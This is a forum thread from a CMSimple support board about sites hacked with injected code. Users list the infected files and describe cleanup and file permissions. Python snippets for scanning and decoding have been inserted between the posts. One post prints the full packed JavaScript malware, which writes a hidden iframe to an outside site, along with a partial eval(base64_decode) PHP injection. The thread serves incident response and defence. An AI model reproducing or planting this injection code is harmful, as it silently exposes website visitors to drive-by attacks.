WARNING !!! HACKERS !!!

A place for security related announcements and discussions - please check this forum frequently!
Tata
Posts: 3586
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia

WARNING !!! HACKERS !!!

Post by Tata » Tue Dec 11, 2012 12:37 pm

Visitors reported today that a website is hacked. Reviewing the index.php and default.php files I've found code attached to each of these files
[ external image ]
How it got there is not known. Check your websites. At first you'll see only the first two lines of the code as the rest is TABbed far to the right.
So far no part of this string can be found via a batch search in Notepad++. It seems I have to open file after file :cry:
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.

cmb
Posts: 14225
Joined: Tue Jun 21, 2011 11:04 am
Location: Bingen, RLP, DE

Re: WARNING !!! HACKERS !!!

Post by cmb » Tue Dec 11, 2012 1:03 pm

Googling for "malware f524d6" brings some results. It seems this site isn't the only one that has been "hacked" and that it's not specifically targeted at CMSimple. Googling for "http://www.slapcentrum.se/" brings up even more interesting results.

What the injected code does: it inserts a (nearly) invisible iframe calling a PHP script on another site. What this script does? I don't know.
Tata wrote: Check your websites. At first you'll see only the first two lines of the code as the rest is TABbed far to the right.
I wouldn't recommend checking the websites with JS enabled, as this will already trigger the other PHP script. It's better to check the source code of the website with JS disabled.
Christoph M. Becker – Plugins for CMSimple_XH

snafu
Posts: 352
Joined: Sun Dec 26, 2010 5:18 pm

Re: WARNING !!! HACKERS !!!

Post by snafu » Tue Dec 11, 2012 1:13 pm

You can also, as a first step, scan your site externally with the Free Website Malware Scanner
Kind regards,
winni

Viewed through a viewfinder, everything becomes a subject.
my gallery; my blog, my CMSimple Template Tutorial

Holger
Site Admin
Posts: 3470
Joined: Mon May 19, 2008 7:10 pm
Location: Hessen, Germany

Re: WARNING !!! HACKERS !!!

Post by Holger » Tue Dec 11, 2012 1:47 pm

snafu wrote: You can also, as a first step, scan your site externally with the Free Website Malware Scanner
Maybe a good idea, but it seems that this scanner could not find the JS-included iframe...
So it's useless in this special case.

KR
Holger

Tata
Posts: 3586
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia

Re: WARNING !!! HACKERS !!!

Post by Tata » Tue Dec 11, 2012 2:06 pm

It was not that tragic finally. Affected were only:
2lang/index.php
2site/index.php
cmsimple/login.php
cmsimple/languages/default.php - not under all installations
plugins/index.php

I downloaded the entire domain + subdomains and searched for a longer part of the script. Notepad++ managed it. But I needed to open all affected files and remove the script manually. In some of the files the script was inserted in the middle of the file (about #519).

Everything is up again now.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.

cmb
Posts: 14225
Joined: Tue Jun 21, 2011 11:04 am
Location: Bingen, RLP, DE

Re: WARNING !!! HACKERS !!!

Post by cmb » Tue Dec 11, 2012 2:52 pm

Tata wrote:It was not that tragic finally.
That's good news! :)

But you might consider trying to find out how this happened; otherwise it might soon happen again (it could be caused by malware on a client). At least you should remove all write permissions from the infected files (444 or 400); they don't need them anyway.
Christoph M. Becker – Plugins for CMSimple_XH
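cmb's advice (find every file carrying the injected code, then take the write permission away) can be turned into a repeatable check. The Python below is an added example, not code from the thread or from CMSimple: it walks a site tree for the indicators mentioned in this thread (eval(base64_decode()) right after the opening <?php, the p,a,c,k,e,d JS packer wrapper, and a 1x1 or display:none iframe) and lists the flagged files that are still writable. The sample tree, file names and placeholder payloads are constructed for the demo.

```python
import os, re, stat, tempfile
# Indicators taken from this thread (hypothetical helper, not a CMSimple tool):
# eval(base64_decode()) right after <?php, the p,a,c,k,e,d packer, a 1x1/hidden iframe.
INDICATORS = {
    'php_eval_base64': re.compile(r'<\?php\s*eval\(base64_decode\('),
    'packed_js': re.compile(r'function\(p,a,c,k,e,d\)'),
    'hidden_iframe': re.compile(r'<iframe[^>]*(width=1\b|height=1\b|display\s*:\s*none)', re.I),
}

def scan_tree(root):
    """Map relative path -> matched indicator names for every flagged file under root."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(('.php', '.js', '.htm', '.html')):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                text = fh.read()
            found = [k for k, rx in INDICATORS.items() if rx.search(text)]
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits

def still_writable(root, rel_paths):
    """Flagged files that keep a write bit, i.e. not yet set to 444/400 as suggested above."""
    wbits = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH
    return sorted(p for p in rel_paths if os.stat(os.path.join(root, p)).st_mode & wbits)

def build_sample_site():
    """Constructed demo tree with placeholder payloads (not the real injected strings)."""
    root = tempfile.mkdtemp()
    files = {
        'cmsimple/login.php': '<?php eval(base64_decode("PLACEHOLDER==")); ?>\n<?php // login code',
        'plugins/calendar/javascript.js': "eval(function(p,a,c,k,e,d){return p}('x',1,1,[]))",
        'content/content.htm': "<p>{{{PLUGIN:calendar();}}}</p><iframe width=1 height=1 style='display:none'></iframe>",
        'template.htm': '<html><head></head><body>clean template</body></html>',
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w') as fh:
            fh.write(body)
    os.chmod(os.path.join(root, 'cmsimple/login.php'), 0o444)  # already hardened
    return root

def demo():
    root = build_sample_site()
    hits = scan_tree(root)
    return hits, still_writable(root, hits)
```

Point scan_tree at a downloaded copy of the web root; a clean file such as the template above produces no hit, and the second list tells you which cleaned files still need the CHMOD.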

Tata
Posts: 3586
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia

Re: WARNING !!! HACKERS !!!

Post by Tata » Tue Dec 11, 2012 3:27 pm

There must still be something in it.
I have found this script also in a language file in advancedform, also in content.htm just after <p>{{{PLUGIN:calendar();}}}</P> and also in template.htm in <head></head>.
Now I have downloaded the backup from this morning, when the page worked well, and have uploaded it back.
The page has a picture above the navigation redirecting to a subdomain. And this doesn't work. Evidently the script must still be somewhere. The funny thing is that as long as I am logged in, everything works fine. Does this point to a place where the script is still active?

EDIT: It was in a content.htm in one of the domains. Soon the upload will be ready and the CHMOD will take place.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.

Tata
Posts: 3586
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia

Re: WARNING !!! HACKERS !!!

Post by Tata » Thu Feb 21, 2013 7:20 pm

I don't know if I am the only one on the WWW having hackers' visits to my webspace at least once a year.
Now hundreds of files are "saturated" by

eval(base64_decode("DQplcnJvcl9.........Cn0KfQ0KfQ0KfQ==")); 
The code is added just after the very first <?php in almost all of them (core and plugins):
language ??.php
??config.php
default.php
config.php
pagedata.php
Also one javascript.js was infected with the code "eval"

(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 0=a c(),4=a c(0.i()+j);3(h.l.7("m 6")!=-1&&2.b.7("8=s")==-1){3(0.g()!=-1){5 9="d"}2.f("<e"+9+" k"+"r=1 z"+"o=1 A=\'B"+"p://x"+".y/q/\' t=\'u:n"+"w\'></3"+"v>");2.b="8=s;"+" 4="+4.C()+"; "}',39,39,'today||document|if|expires|var||indexOf|_fhjtju|iframe|new|cookie|Date|ame|ifr|write|getTimezoneOffset|navigator|getTime|2678400000|wi|appVersion|MSIE||ht||b2b|dth||style|display|rame|one|secatm|net|heig|src|htt|toGMTString'.split('|')));
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
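cmb wrote above that he did not know what the injected script does. The Python below is an added example, not code from the thread: it reimplements the decoding loop of the p,a,c,k,e,d packer that the javascript.js snippet above uses and runs it on the template string and word list transcribed from that snippet, so the iframe logic can be read in clear text. Only those two constants are copied from the post; the functions are the example's own.

```python
import re

# Packed sample transcribed from the javascript.js snippet posted above:
# the template string p, the radix a, the word count c and the word list k.
PACKED_P = (
    '5 0=a c(),4=a c(0.i()+j);3(h.l.7("m 6")!=-1&&2.b.7("8=s")==-1)'
    '{3(0.g()!=-1){5 9="d"}2.f("<e"+9+" k"+"r=1 z"+"o=1 A=\'B"+"p://x"'
    '+".y/q/\' t=\'u:n"+"w\'></3"+"v>");2.b="8=s;"+" 4="+4.C()+"; "}'
)
RADIX, COUNT = 39, 39
WORDS = ('today||document|if|expires|var||indexOf|_fhjtju|iframe|new|cookie|'
         'Date|ame|ifr|write|getTimezoneOffset|navigator|getTime|2678400000|'
         'wi|appVersion|MSIE||ht||b2b|dth||style|display|rame|one|secatm|net|'
         'heig|src|htt|toGMTString').split('|')

def encode_token(c, radix):
    """Mirror of the packer's e(): word index -> short token (0-9, a-z, then A, B, ...)."""
    head = '' if c < radix else encode_token(c // radix, radix)
    c %= radix
    tail = chr(c + 29) if c > 35 else '0123456789abcdefghijklmnopqrstuvwxyz'[c]
    return head + tail

def unpack(p, radix, count, words):
    """Replay the packer's loop: for c = count-1 .. 0 replace whole-word token e(c) by words[c]."""
    for c in range(count - 1, -1, -1):
        if words[c]:  # an empty entry means "leave that token alone", exactly as the JS does
            token = re.escape(encode_token(c, radix))
            p = re.sub(r'\b' + token + r'\b', lambda _m, w=words[c]: w, p)
    return p

def unpack_sample():
    """Decode the snippet from the thread and return the readable JavaScript."""
    return unpack(PACKED_P, RADIX, COUNT, WORDS)

if __name__ == '__main__':
    print(unpack_sample())
```

The decoded script only runs for "MSIE 6" visitors that do not yet carry its marker cookie, writes a width=1 height=1 display:none iframe, and sets the cookie for 31 days, which is why a visitor (or an external scanner) sees nothing and why cmb's advice to inspect the page source with JS disabled is the right approach.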
